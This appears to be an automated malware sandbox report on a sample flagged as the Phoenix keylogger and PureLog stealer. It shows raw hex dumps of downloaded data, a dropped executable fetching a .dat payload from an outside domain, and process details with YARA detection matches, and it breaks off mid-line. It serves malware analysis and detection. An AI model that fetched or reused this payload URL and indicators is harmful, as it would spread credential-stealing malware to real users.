.m7O2PDDjhO)u~+o}X}rv-Iud0"1[h5h7gYE!J.G{[;3)Pc4D@S}MA4m+ b/`8-#QUu G\kL*f =` \|k)
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: f8 f9 00 86 20 29 a2 f7 d4 8d bf 09 59 f5 20 1a e5 50 3a d5 3a 0c b0 22 b8 85 8f cc dd 55 13 69 56 ff cb 7c 1d d9 68 8f 77 d1 9b 01 d9 3a 25 92 9d ec a2 e6 c7 65 fb 3b 0c 22 2b 36 b3 f0 fb cc 82 04 62 61 b1 6a 9e ea 0a 83 a5 03 49 df 38 96 09 1a 25 af fe d9 b5 99 ca a7 3a c4 99 53 85 74 b0 af 77 41 66 15 48 76 aa 59 06 4e 75 e3 0e 79 7f 03 c6 e2 ab 86 8b 1c 5f 4e 99 00 60 b5 a5 60 03 bb 20 c8 95 77 e8 b8 00 50 21 d5 de 0d 63 6a a1 cd 7e 2b e5 a5 2d 99 50 ca fb 5c e9 41 8f 68 19 55 06 0d ad c8 07 c5 fd d6 9b 51 a9 09 90 c2 7e 95 ec 92 8b 84 43 f6 d6 7f a9 73 00 a8 a2 8b e9 93 66 93 e9 63 92 ac 42 04 75 45 fe dd ad b6 fe 88 6d ab 1e ff 3a ef 2f ae a3 1c 02 2f 82 67 8c a3 1b 78 c4 4b 88 2a 94 59 6b a7 44 5b df 82 77 0a e2 60 c0 25 cc 3f 41 0b 82 b9 18 c0 ce Data Ascii: )Y P::"UiV\|hw:%e;"+6bajI8%:StwAfHvYNuy_N`` wP!cj~+-P\AhUQ~CsfcBuEm://gxK*YkD[w`%?A
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: 2e a7 24 94 1d e5 c7 f2 43 22 99 b0 cf 27 b3 73 f1 ed 48 db b7 9b 8e be 96 bf c2 1d c1 19 34 c4 bc fa ce 03 8f c9 a3 bb 70 5e 8f 2e 3e 9e 05 da e8 7e 82 5a 14 6f 5f 43 1e e8 c4 9e 67 65 a9 1b dd 8b 3b ad 44 1c a7 4a 97 6e 40 90 65 2a bf 35 a5 cd bf fe 12 e4 ff 31 63 2d 94 da ac d6 77 c0 75 ac 68 bf 6d 2f d2 8f 16 cc 81 fc 6c c3 d3 95 36 c3 d7 aa 1f fe f3 cf e8 49 22 8c 86 c9 f0 82 5d 61 fc a5 7f 39 a3 49 4e 10 b6 1d ff 9f a2 54 2a 6c 29 79 c7 25 5c 7f 8d 68 e8 5e 98 a9 54 ab db 66 96 4a cd 64 35 53 6f db 40 60 04 82 44 d3 9e 3e fc 96 87 23 8e eb 4f 6b 5b 6e 44 48 1a ba 80 5a c8 68 04 a0 8e db a9 9b 5a 06 b0 eb da 61 5d 14 6a 47 1e 83 90 84 70 cf da 2e 61 fd 76 22 c7 93 93 96 39 33 bc 87 1e d4 7f a8 ba f9 42 34 fe 8d 23 7f 53 cc 54 36 59 e2 f4 c7 8e 35 cc Data Ascii: .$C"'sH4p^.>~Zo_Cge;DJn@e51c-wuhm/l6I"]a9INTl)y%\h^TfJd5So@`D>#Ok[nDHZhZa]jGp.av"93B4#ST6Y5
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: f8 c4 ef 0c 21 0c 81 08 5e 28 fe ce 27 c7 98 1c 9a 77 bc 7b 09 cb 41 b3 7b 01 6b 2d af 79 a3 96 71 02 e0 ac c0 04 e9 d5 46 81 e6 13 87 fb 62 7b 39 fd 09 3e 39 fe f4 65 97 59 0c c8 bc 51 5b 91 82 3f f1 9a d6 4d 59 8d 28 3e 46 c4 b9 4e b8 55 7d 97 db f0 5b 49 e0 15 9c ff 85 94 9a 7c 55 a1 80 fa 9f bb 74 9f ac de 22 99 95 db 22 fa d3 fc 5c d7 ec 38 17 ba d6 93 f4 8c 04 5c 13 b3 7c 2d df ea 9e c1 5a 9d 00 ac e8 07 b3 07 85 a6 84 00 ee 37 7a 00 27 16 9f 8a 0d 5e 29 6d 65 61 9f db 3c e1 95 1d 70 26 5b 9b 00 69 6b 22 1d 78 de bb 45 e2 6b a5 69 1b 62 6e ef 5f 88 fa 2e f1 ca 10 09 2f 4a 92 ca 90 c1 0d af f6 63 bd db b2 0e 98 6b 95 6f fd 8c 02 85 d3 4b 3b d8 17 31 c2 24 c4 a6 2c 1b 41 d1 d7 7a 65 59 61 08 06 8b fd 3e 9e e0 b5 3b 0c b7 59 00 e7 c4 e1 64 cb 5c 97 5c Data Ascii: !^('w{A{k-yqFb{9>9eYQ[?MY(>FNU}[I\|Ut""\8\\|-Z7z'^)mea<p&[ik"xEkibn_./JckoK;1$,AzeYa>;Yd\\
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: b4 71 61 0e 2a b4 ca 06 a0 ed 24 56 37 bf bb d0 06 38 44 66 b5 63 0f e3 5e 15 03 4f 32 6d 11 5e 7c 05 39 3a 3b 86 75 14 e8 23 2d e0 31 cb 0d b6 13 05 d3 fd 2e ec 2f 36 09 54 84 33 40 a0 7d d4 a3 78 5e 45 36 e1 7f 54 9d d9 d6 fa 3a 5e 4f 04 cf c3 d7 57 28 ee 84 66 5a 4a 26 3b 4c a9 32 fb 06 58 5a 7e c7 7d e7 81 01 b7 93 7e ca 7f 02 d7 38 cb de a3 c1 31 f7 e0 29 55 c3 b7 7c 4e 85 3f 05 92 b4 da 1d ff fe 89 b4 eb 2a 7b 1e 25 8b b1 a4 b9 f4 31 f0 2d 4e d3 b4 d3 40 97 eb 67 04 45 66 22 72 1e 93 cf c5 90 be 1d ae 9b 27 c3 b9 a5 14 f7 da 54 99 3a c1 08 71 81 ee ea a0 88 e3 e4 61 f3 ca dc b8 3f 3b 86 7b e0 9d 43 3d 18 04 d4 49 4a 02 3c fe 79 76 0e 52 35 bf 67 28 72 b6 50 57 b6 fe 9e df 23 bd 58 ae 1a 89 be 04 d7 8f e9 e9 59 ec a3 2d 8b 21 27 fa 17 75 b2 16 f2 21 Data Ascii: qa$V78Dfc^O2m^\|9:;u#-1./6T3@}x^E6T:^OW(fZJ&;L2XZ~}~81)U\|N?{%1-N@gEf"r'T:qa?;{C=IJ<yvR5g(rPW#XY-!'u!
2024-07-03 14:17:12 UTC	346	IN	Data Raw: 5b 71 a9 82 0a 68 d3 6a 71 cb 1c 25 34 a9 29 fd 35 27 6a 35 3e 4c 99 d2 18 49 f6 0f 43 18 d1 81 87 ce 0f 92 a3 f8 39 f3 c4 a7 d8 87 0a 78 be 32 54 9e 9b 5a 9e 09 38 66 bc d1 5a b0 f5 57 0a 72 6b 03 62 3b 53 eb e8 4d 62 a3 29 d8 34 8a c0 b4 d3 2e 71 62 b7 9e 30 cd 62 e7 51 da 22 36 4d 37 bb 91 54 05 69 44 2e 11 16 ed ee 6c 3b c9 18 cc 7b 25 93 e3 11 b8 8f 99 f4 43 cc 9c b7 8b 00 63 ec 6d d1 bd a2 62 b7 62 4c ce cc 5f 52 54 5f f9 b0 07 f0 55 ff 57 c0 0b 27 0e 3c d1 de 52 61 c2 7a bb 8e 53 26 69 cd 10 51 07 58 ea 4c fc bc 9a f7 d6 77 8d 8c aa 73 fc 67 37 24 3b 41 ed 25 19 99 09 86 10 a2 4a 43 e1 df 66 0b ed 3f dd 17 7a af b0 73 e2 1a 60 09 08 f8 e6 12 0a 2a 40 80 96 2e 2d 56 6e 7a 0d 8e f7 89 fc 7e 91 a1 82 9b df 74 47 e8 04 ca ee 00 ba 1f 4d 13 a1 a4 91 04 Data Ascii: [qhjq%4)5'j5>LIC9x2TZ8fZWrkb;SMb)4.qb0bQ"6M7TiD.l;{%CcmbbL_RT_UW'<RazS&iQXLwsg7$;A%JCf?zs`*@.-Vnz~tGM
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: 34 30 32 32 0d 0a 77 6d d1 71 6d 65 69 d0 98 f3 40 af 0b c9 d6 2e 2b 01 34 a5 88 7c 1b a0 aa d3 f9 0d 22 d1 8d dc 75 8e f8 4c ee c5 74 a0 8c 70 39 c0 93 6a 9b 2c 0a c5 f7 16 3d ca ca 96 0c c1 3c d7 74 1c 2e 1e 21 ec d7 0f 7e 28 4b 21 e5 aa 41 0d fd 27 2d 43 11 f1 6a 58 a8 f3 69 98 3e 97 40 b7 f5 ce 3c 4a dc 3e a0 61 65 26 04 15 00 0c 7d 9a 57 f4 eb 62 53 f1 e5 10 0b d2 89 f5 b2 a4 70 ee a2 6f b0 86 bf 9f a5 74 94 c3 d1 68 f8 7f 80 e6 00 cb c5 3e cd d7 e7 a9 51 99 6d 3c 9c 2e fe ce 39 38 c6 97 43 87 ce 96 71 97 66 a6 69 35 94 d5 ae 76 a7 50 ae 74 b1 5b c4 53 53 4b c2 fb aa 98 89 73 b4 5b 06 f7 e1 03 d9 a4 02 6d d0 b6 dc 81 ae 15 c0 49 6e 77 18 b5 e5 d5 ce b3 75 47 c4 b6 83 a0 4d cd e9 8d 7f f3 22 75 79 38 23 5c c7 dc 72 16 e8 a7 ec 1d 51 99 f8 b7 c7 bc 6d Data Ascii: 4022wmqmei@.+4\|"uLtp9j,=<t.!~(K!A'-CjXi>@<J>ae&}WbSpoth>Qm<.98Cqfi5vPt[SSKs[mInwuGM"uy8#\rQm
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: ca 5d 08 71 ba 25 4b ae 6a 33 a8 ff 1f 2e b1 85 52 c2 7a 88 31 11 03 11 76 ae 5b f4 45 c6 c8 60 6a 2f 87 e1 24 b1 4c 30 f6 25 20 55 aa f7 29 c5 43 60 53 53 c9 30 a9 bb 60 52 e8 0b af e8 50 34 d7 09 28 7f 37 c7 85 5c 07 91 89 01 ef 5d 5c 5d 1c ea 9e b9 49 ed 27 e8 67 17 23 49 cd e7 05 bb 96 0c b9 59 24 da d1 21 a2 58 67 40 c2 14 9a 07 69 13 ea 97 7d 37 fd 9c 9f c9 67 02 b5 c1 ed e2 c0 6a 01 08 7e 88 77 df 95 3d 39 27 0a af 22 ff 38 d7 46 68 92 2e 07 7b 44 60 68 5e cd b7 51 54 2a 30 e2 1a 63 f3 fe 65 0c ca 8e cd b3 da 38 57 a1 14 fb 48 b5 09 94 24 ab 4e 1d f5 2a 7c 6c 48 54 2a da 12 85 39 42 aa 0b 58 c9 c4 09 93 98 13 08 6b 4a ac bc 9a eb 2a a7 fe a6 6c b2 8e e9 56 8b bb 0e af 40 18 c8 aa a1 da 85 cd 99 ef 96 16 75 aa b3 56 0a 29 89 8c 6c e4 4d 0c c0 be 83 Data Ascii: ]q%Kj3.Rz1v[E`j/$L0% U)C`SS0`RP4(7\]\]I'g#IY$!Xg@i}7gj~w=9'"8Fh.{D`h^QT0ce8WH$N\|lHT9BXkJlV@uV)lM
2024-07-03 14:17:12 UTC	1369	IN	Data Raw: 20 d6 96 a2 51 f8 c6 62 d0 b5 2e 41 b4 bc 1a 85 4a 92 a1 20 5c f6 0f 8d bf b4 b3 05 b2 c6 34 b1 83 fe ca 9b 1d d3 ad be 69 de f8 68 32 16 94 a2 db 3f 2a 3f 89 ae b5 29 0c d6 bb 1e 64 3a ee cd f3 96 c9 f4 6f 4c 2c d9 9b b8 50 82 5a a8 c1 0f 90 fd 96 27 55 3f ac fb c2 35 69 48 dd f0 fc 37 a2 62 4d 9a 45 c9 bd 0d bc a9 65 32 74 4e d5 aa 1b fa ab 42 ab 6c 4e 45 49 4d 05 85 c1 fa 24 a9 50 2e 0b 60 73 60 a9 26 ef df ab 02 e6 72 b9 00 33 f5 b1 f3 49 4e 97 58 ae 9f 5a aa d3 09 ee 25 2f 3d 12 ad 02 75 5b 93 d3 83 75 9d a9 1c 87 03 8c d3 6b f3 bf f7 53 36 73 d7 d9 3e 6e 10 63 12 10 d5 ac d4 c6 4c 58 8c 55 b2 b8 e7 d4 7e 94 bd 18 f2 7a b9 8e c9 9e dc af a9 e3 11 3f 31 67 4b 89 84 bd cf d6 02 f1 84 b1 03 e7 1c 50 02 f6 6d c5 9c ae da 3c 9f ca 6b 8b c8 46 4e 84 01 1d Data Ascii: Qb.AJ \4ih2?*?)d:oL,PZ'U?5iH7bMEe2tNBlNEIM$P.`s`&r3INXZ%/=u[ukS6s>ncLXU~z?1gKPm<kFN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49711	104.21.10.178	443	1816	C:\Users\user\AppData\Roaming\Qulzerug.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 14:17:19 UTC	80	OUT	GET /Qlnxkam.dat HTTP/1.1 Host: nexoproducciones.cl Connection: Keep-Alive
2024-07-03 14:17:19 UTC	683	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 14:17:19 GMT Transfer-Encoding: chunked Connection: close last-modified: Wed, 26 Jun 2024 08:23:45 GMT Cache-Control: max-age=2592000 expires: Fri, 02 Aug 2024 14:17:19 GMT vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ou7Klij5E9r4WjrxSIUzADegUIu1znp3j0o4Rs3R%2FbWBl%2FJrBVmgHaoAsMgxaJ%2FInrhqkuKGAjAY%2FPKe5qfYtVbTRcne3SIBa3PzQHRWK6jNggM9Az%2BGuRYJjKXW7KQJzdX%2FXCsc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d77f97d81617b5-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 14:17:19 UTC	686	IN	Data Raw: 31 65 62 39 0d 0a 2c b2 2b 48 9f af 6d cc 6e 66 c9 60 11 41 de ac 52 d9 7c 3a c2 d0 d9 15 e5 02 e6 ca 84 a3 05 bc cc ca f5 cf 7a ce cc 90 7b 8d 86 69 82 9c 9f 28 95 14 50 94 4a 00 8d 52 84 db dd 71 75 3e 9e 73 e0 ad 51 b6 1c 4a e0 43 bf ef c4 f9 d0 25 07 26 6a 4e d7 fc 1a 45 d3 b3 bd 09 09 83 45 3a 7c e2 2c 6e 29 39 0e 5d 55 c3 d6 fe 0c 42 ae de d5 87 85 52 81 0a 76 4a 0f e1 a7 fb 3d a6 5e a2 77 fe 4d f0 35 d1 ec c6 5a c0 db 59 8e bf 2d 67 8e c2 df 5f d8 c0 50 7e 86 18 bd 68 d8 96 0d 51 ec 2a dd 41 19 c3 a3 be 09 66 10 2c 0b e2 13 96 83 e2 36 9a 71 d6 2f 88 13 80 13 21 84 6e 6e 47 62 9d 02 79 f7 d7 f6 31 a3 89 c1 b8 e8 73 e8 bf 31 be 95 83 26 c0 3e 93 da 1d 00 cf 14 24 d1 27 46 e9 bf 98 51 12 b6 46 4a 3f 14 6e 03 bf a6 da 60 f8 0c 7b db 89 e0 f4 e3 c8 18 Data Ascii: 1eb9,+Hmnf`AR\|:z{i(PJRqu>sQJC%&jNEE:\|,n)9]UBRvJ=^wM5ZY-g_P~hQ*Af,6q/!nnGby1s1&>$'FQFJ?n`{
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 92 4d 51 a0 a0 fd a6 46 15 63 f2 df 95 13 a8 1b ee 9e e9 98 e3 7d 55 a9 71 02 6e 81 8a c1 2e d5 20 2e 6d 37 4f 94 13 e1 01 a2 0b 8f dd 32 0a a8 9e 50 44 fb c0 fb 44 ce 95 85 d5 1d 6a 68 4f ae 94 bd eb b7 b1 29 cd ab a3 b9 75 1c 7e ef f1 06 9d 2b d4 6f d7 7d 58 7d bd 06 72 08 76 b6 2d 49 75 64 83 f7 ef 30 fe 8e d9 a0 22 31 d7 c0 5b 68 b8 35 68 9d ae 0f 37 e1 af b7 67 c6 dc a3 da dd 59 02 aa 45 87 af 18 8b 21 00 d1 00 8d 9d b7 4a 2e b0 47 c5 7b 5b b0 3b 33 29 50 63 34 1f 10 f6 d1 44 9d 40 53 98 92 80 7d f4 99 d2 ac 4d 91 e3 90 01 b0 f5 41 34 ab b4 6d 0b a0 2b 20 1f 62 2f a2 60 38 d5 2d b8 23 51 b3 05 e2 55 75 06 cb f7 b9 aa e7 e9 9b 9a e1 20 47 a5 e4 5c ea 0d 6b b1 1c 80 db 85 98 4c b7 2a f2 8d f7 c7 da f5 66 ed 20 3d 60 98 20 7c 87 a4 6b 98 29 10 d1 70 ea Data Ascii: MQFc}Uqn. .m7O2PDDjhO)u~+o}X}rv-Iud0"1[h5h7gYE!J.G{[;3)Pc4D@S}MA4m+ b/`8-#QUu G\kL*f =` \|k)p
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 20 29 a2 f7 d4 8d bf 09 59 f5 20 1a e5 50 3a d5 3a 0c b0 22 b8 85 8f cc dd 55 13 69 56 ff cb 7c 1d d9 68 8f 77 d1 9b 01 d9 3a 25 92 9d ec a2 e6 c7 65 fb 3b 0c 22 2b 36 b3 f0 fb cc 82 04 62 61 b1 6a 9e ea 0a 83 a5 03 49 df 38 96 09 1a 25 af fe d9 b5 99 ca a7 3a c4 99 53 85 74 b0 af 77 41 66 15 48 76 aa 59 06 4e 75 e3 0e 79 7f 03 c6 e2 ab 86 8b 1c 5f 4e 99 00 60 b5 a5 60 03 bb 20 c8 95 77 e8 b8 00 50 21 d5 de 0d 63 6a a1 cd 7e 2b e5 a5 2d 99 50 ca fb 5c e9 41 8f 68 19 55 06 0d ad c8 07 c5 fd d6 9b 51 a9 09 90 c2 7e 95 ec 92 8b 84 43 f6 d6 7f a9 73 00 a8 a2 8b e9 93 66 93 e9 63 92 ac 42 04 75 45 fe dd ad b6 fe 88 6d ab 1e ff 3a ef 2f ae a3 1c 02 2f 82 67 8c a3 1b 78 c4 4b 88 2a 94 59 6b a7 44 5b df 82 77 0a e2 60 c0 25 cc 3f 41 0b 82 b9 18 c0 ce 1e f9 7e c5 Data Ascii: )Y P::"UiV\|hw:%e;"+6bajI8%:StwAfHvYNuy_N`` wP!cj~+-P\AhUQ~CsfcBuEm://gxK*YkD[w`%?A~
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 1d e5 c7 f2 43 22 99 b0 cf 27 b3 73 f1 ed 48 db b7 9b 8e be 96 bf c2 1d c1 19 34 c4 bc fa ce 03 8f c9 a3 bb 70 5e 8f 2e 3e 9e 05 da e8 7e 82 5a 14 6f 5f 43 1e e8 c4 9e 67 65 a9 1b dd 8b 3b ad 44 1c a7 4a 97 6e 40 90 65 2a bf 35 a5 cd bf fe 12 e4 ff 31 63 2d 94 da ac d6 77 c0 75 ac 68 bf 6d 2f d2 8f 16 cc 81 fc 6c c3 d3 95 36 c3 d7 aa 1f fe f3 cf e8 49 22 8c 86 c9 f0 82 5d 61 fc a5 7f 39 a3 49 4e 10 b6 1d ff 9f a2 54 2a 6c 29 79 c7 25 5c 7f 8d 68 e8 5e 98 a9 54 ab db 66 96 4a cd 64 35 53 6f db 40 60 04 82 44 d3 9e 3e fc 96 87 23 8e eb 4f 6b 5b 6e 44 48 1a ba 80 5a c8 68 04 a0 8e db a9 9b 5a 06 b0 eb da 61 5d 14 6a 47 1e 83 90 84 70 cf da 2e 61 fd 76 22 c7 93 93 96 39 33 bc 87 1e d4 7f a8 ba f9 42 34 fe 8d 23 7f 53 cc 54 36 59 e2 f4 c7 8e 35 cc 4f f3 19 83 Data Ascii: C"'sH4p^.>~Zo_Cge;DJn@e51c-wuhm/l6I"]a9INTl)y%\h^TfJd5So@`D>#Ok[nDHZhZa]jGp.av"93B4#ST6Y5O
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 21 0c 81 08 5e 28 fe ce 27 c7 98 1c 9a 77 bc 7b 09 cb 41 b3 7b 01 6b 2d af 79 a3 96 71 02 e0 ac c0 04 e9 d5 46 81 e6 13 87 fb 62 7b 39 fd 09 3e 39 fe f4 65 97 59 0c c8 bc 51 5b 91 82 3f f1 9a d6 4d 59 8d 28 3e 46 c4 b9 4e b8 55 7d 97 db f0 5b 49 e0 15 9c ff 85 94 9a 7c 55 a1 80 fa 9f bb 74 9f ac de 22 99 95 db 22 fa d3 fc 5c d7 ec 38 17 ba d6 93 f4 8c 04 5c 13 b3 7c 2d df ea 9e c1 5a 9d 00 ac e8 07 b3 07 85 a6 84 00 ee 37 7a 00 27 16 9f 8a 0d 5e 29 6d 65 61 9f db 3c e1 95 1d 70 26 5b 9b 00 69 6b 22 1d 78 de bb 45 e2 6b a5 69 1b 62 6e ef 5f 88 fa 2e f1 ca 10 09 2f 4a 92 ca 90 c1 0d af f6 63 bd db b2 0e 98 6b 95 6f fd 8c 02 85 d3 4b 3b d8 17 31 c2 24 c4 a6 2c 1b 41 d1 d7 7a 65 59 61 08 06 8b fd 3e 9e e0 b5 3b 0c b7 59 00 e7 c4 e1 64 cb 5c 97 5c 0b ba 5b 78 Data Ascii: !^('w{A{k-yqFb{9>9eYQ[?MY(>FNU}[I\|Ut""\8\\|-Z7z'^)mea<p&[ik"xEkibn_./JckoK;1$,AzeYa>;Yd\\[x
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 2a b4 ca 06 a0 ed 24 56 37 bf bb d0 06 38 44 66 b5 63 0f e3 5e 15 03 4f 32 6d 11 5e 7c 05 39 3a 3b 86 75 14 e8 23 2d e0 31 cb 0d b6 13 05 d3 fd 2e ec 2f 36 09 54 84 33 40 a0 7d d4 a3 78 5e 45 36 e1 7f 54 9d d9 d6 fa 3a 5e 4f 04 cf c3 d7 57 28 ee 84 66 5a 4a 26 3b 4c a9 32 fb 06 58 5a 7e c7 7d e7 81 01 b7 93 7e ca 7f 02 d7 38 cb de a3 c1 31 f7 e0 29 55 c3 b7 7c 4e 85 3f 05 92 b4 da 1d ff fe 89 b4 eb 2a 7b 1e 25 8b b1 a4 b9 f4 31 f0 2d 4e d3 b4 d3 40 97 eb 67 04 45 66 22 72 1e 93 cf c5 90 be 1d ae 9b 27 c3 b9 a5 14 f7 da 54 99 3a c1 08 71 81 ee ea a0 88 e3 e4 61 f3 ca dc b8 3f 3b 86 7b e0 9d 43 3d 18 04 d4 49 4a 02 3c fe 79 76 0e 52 35 bf 67 28 72 b6 50 57 b6 fe 9e df 23 bd 58 ae 1a 89 be 04 d7 8f e9 e9 59 ec a3 2d 8b 21 27 fa 17 75 b2 16 f2 21 85 14 c6 7c Data Ascii: $V78Dfc^O2m^\|9:;u#-1./6T3@}x^E6T:^OW(fZJ&;L2XZ~}~81)U\|N?{%1-N@gEf"r'T:qa?;{C=IJ<yvR5g(rPW#XY-!'u!\|
2024-07-03 14:17:19 UTC	342	IN	Data Raw: 0a 68 d3 6a 71 cb 1c 25 34 a9 29 fd 35 27 6a 35 3e 4c 99 d2 18 49 f6 0f 43 18 d1 81 87 ce 0f 92 a3 f8 39 f3 c4 a7 d8 87 0a 78 be 32 54 9e 9b 5a 9e 09 38 66 bc d1 5a b0 f5 57 0a 72 6b 03 62 3b 53 eb e8 4d 62 a3 29 d8 34 8a c0 b4 d3 2e 71 62 b7 9e 30 cd 62 e7 51 da 22 36 4d 37 bb 91 54 05 69 44 2e 11 16 ed ee 6c 3b c9 18 cc 7b 25 93 e3 11 b8 8f 99 f4 43 cc 9c b7 8b 00 63 ec 6d d1 bd a2 62 b7 62 4c ce cc 5f 52 54 5f f9 b0 07 f0 55 ff 57 c0 0b 27 0e 3c d1 de 52 61 c2 7a bb 8e 53 26 69 cd 10 51 07 58 ea 4c fc bc 9a f7 d6 77 8d 8c aa 73 fc 67 37 24 3b 41 ed 25 19 99 09 86 10 a2 4a 43 e1 df 66 0b ed 3f dd 17 7a af b0 73 e2 1a 60 09 08 f8 e6 12 0a 2a 40 80 96 2e 2d 56 6e 7a 0d 8e f7 89 fc 7e 91 a1 82 9b df 74 47 e8 04 ca ee 00 ba 1f 4d 13 a1 a4 91 04 25 c2 45 ae Data Ascii: hjq%4)5'j5>LIC9x2TZ8fZWrkb;SMb)4.qb0bQ"6M7TiD.l;{%CcmbbL_RT_UW'<RazS&iQXLwsg7$;A%JCf?zs`*@.-Vnz~tGM%E
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 36 30 31 34 0d 0a 77 6d d1 71 6d 65 69 d0 98 f3 40 af 0b c9 d6 2e 2b 01 34 a5 88 7c 1b a0 aa d3 f9 0d 22 d1 8d dc 75 8e f8 4c ee c5 74 a0 8c 70 39 c0 93 6a 9b 2c 0a c5 f7 16 3d ca ca 96 0c c1 3c d7 74 1c 2e 1e 21 ec d7 0f 7e 28 4b 21 e5 aa 41 0d fd 27 2d 43 11 f1 6a 58 a8 f3 69 98 3e 97 40 b7 f5 ce 3c 4a dc 3e a0 61 65 26 04 15 00 0c 7d 9a 57 f4 eb 62 53 f1 e5 10 0b d2 89 f5 b2 a4 70 ee a2 6f b0 86 bf 9f a5 74 94 c3 d1 68 f8 7f 80 e6 00 cb c5 3e cd d7 e7 a9 51 99 6d 3c 9c 2e fe ce 39 38 c6 97 43 87 ce 96 71 97 66 a6 69 35 94 d5 ae 76 a7 50 ae 74 b1 5b c4 53 53 4b c2 fb aa 98 89 73 b4 5b 06 f7 e1 03 d9 a4 02 6d d0 b6 dc 81 ae 15 c0 49 6e 77 18 b5 e5 d5 ce b3 75 47 c4 b6 83 a0 4d cd e9 8d 7f f3 22 75 79 38 23 5c c7 dc 72 16 e8 a7 ec 1d 51 99 f8 b7 c7 bc 6d Data Ascii: 6014wmqmei@.+4\|"uLtp9j,=<t.!~(K!A'-CjXi>@<J>ae&}WbSpoth>Qm<.98Cqfi5vPt[SSKs[mInwuGM"uy8#\rQm
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: ca 5d 08 71 ba 25 4b ae 6a 33 a8 ff 1f 2e b1 85 52 c2 7a 88 31 11 03 11 76 ae 5b f4 45 c6 c8 60 6a 2f 87 e1 24 b1 4c 30 f6 25 20 55 aa f7 29 c5 43 60 53 53 c9 30 a9 bb 60 52 e8 0b af e8 50 34 d7 09 28 7f 37 c7 85 5c 07 91 89 01 ef 5d 5c 5d 1c ea 9e b9 49 ed 27 e8 67 17 23 49 cd e7 05 bb 96 0c b9 59 24 da d1 21 a2 58 67 40 c2 14 9a 07 69 13 ea 97 7d 37 fd 9c 9f c9 67 02 b5 c1 ed e2 c0 6a 01 08 7e 88 77 df 95 3d 39 27 0a af 22 ff 38 d7 46 68 92 2e 07 7b 44 60 68 5e cd b7 51 54 2a 30 e2 1a 63 f3 fe 65 0c ca 8e cd b3 da 38 57 a1 14 fb 48 b5 09 94 24 ab 4e 1d f5 2a 7c 6c 48 54 2a da 12 85 39 42 aa 0b 58 c9 c4 09 93 98 13 08 6b 4a ac bc 9a eb 2a a7 fe a6 6c b2 8e e9 56 8b bb 0e af 40 18 c8 aa a1 da 85 cd 99 ef 96 16 75 aa b3 56 0a 29 89 8c 6c e4 4d 0c c0 be 83 Data Ascii: ]q%Kj3.Rz1v[E`j/$L0% U)C`SS0`RP4(7\]\]I'g#IY$!Xg@i}7gj~w=9'"8Fh.{D`h^QT0ce8WH$N\|lHT9BXkJlV@uV)lM
2024-07-03 14:17:19 UTC	1369	IN	Data Raw: 20 d6 96 a2 51 f8 c6 62 d0 b5 2e 41 b4 bc 1a 85 4a 92 a1 20 5c f6 0f 8d bf b4 b3 05 b2 c6 34 b1 83 fe ca 9b 1d d3 ad be 69 de f8 68 32 16 94 a2 db 3f 2a 3f 89 ae b5 29 0c d6 bb 1e 64 3a ee cd f3 96 c9 f4 6f 4c 2c d9 9b b8 50 82 5a a8 c1 0f 90 fd 96 27 55 3f ac fb c2 35 69 48 dd f0 fc 37 a2 62 4d 9a 45 c9 bd 0d bc a9 65 32 74 4e d5 aa 1b fa ab 42 ab 6c 4e 45 49 4d 05 85 c1 fa 24 a9 50 2e 0b 60 73 60 a9 26 ef df ab 02 e6 72 b9 00 33 f5 b1 f3 49 4e 97 58 ae 9f 5a aa d3 09 ee 25 2f 3d 12 ad 02 75 5b 93 d3 83 75 9d a9 1c 87 03 8c d3 6b f3 bf f7 53 36 73 d7 d9 3e 6e 10 63 12 10 d5 ac d4 c6 4c 58 8c 55 b2 b8 e7 d4 7e 94 bd 18 f2 7a b9 8e c9 9e dc af a9 e3 11 3f 31 67 4b 89 84 bd cf d6 02 f1 84 b1 03 e7 1c 50 02 f6 6d c5 9c ae da 3c 9f ca 6b 8b c8 46 4e 84 01 1d Data Ascii: Qb.AJ \4ih2?*?)d:oL,PZ'U?5iH7bMEe2tNBlNEIM$P.`s`&r3INXZ%/=u[ukS6s>ncLXU~z?1gKPm<kFN

Target ID:	0
Start time:	10:16:55
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\6Ek4nfs2y1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6Ek4nfs2y1.exe"
Imagebase:	0x590000
File size:	9'728 bytes
MD5 hash:	21CCB2CD9A4FBC259AB1110BC687B960
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1299183493.0000000005860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara 